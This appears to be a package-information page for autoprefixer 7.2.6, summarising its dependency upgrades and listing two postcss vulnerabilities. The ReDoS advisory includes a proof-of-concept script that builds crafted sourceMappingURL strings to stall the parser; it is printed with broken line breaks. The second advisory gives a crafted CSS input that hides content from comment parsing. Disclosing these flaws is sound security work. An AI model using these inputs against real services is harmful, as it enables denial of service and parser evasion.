Autoprefixer version 7.2.6 represents a subtle but important update over its predecessor, 7.2.5, primarily focusing on dependency upgrades to ensure compatibility and access to the latest browser support data. The core functionality remains the same: automatically parsing CSS and adding necessary vendor prefixes to CSS rules, leveraging the Can I Use database. This eliminates the developer's burden of manually managing prefixes for various browsers, streamlining the CSS writing process and ensuring cross-browser compatibility.
The key distinction lies in the updated dependencies. Version 7.2.6 incorporates postcss at ^6.0.17 (up from ^6.0.16), browserslist at ^2.11.3 (up from ^2.11.1), and crucially, caniuse-lite at ^1.0.30000805 (up from ^1.0.30000791). The importance of updating caniuse-lite is that it provides fresh data about browser support for CSS features, thus allowing autoprefixer to generate more accurate and effective prefixes based on the current browser landscape. These updates guarantee that autoprefixer is aware of the latest browser versions and their respective CSS support, leading to more reliable prefixing. The other dependencies, num2fraction, normalize-range, and postcss-value-parser remain unchanged, signifying that the underlying value parsing and manipulation logic remained stable between these versions. Considering that autoprefixer handles critical cross-browser compatibility, staying updated on minor versions is a way to ensure the best and latest CSS features compatibility.
All the vulnerabilities related to the version 7.2.6 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.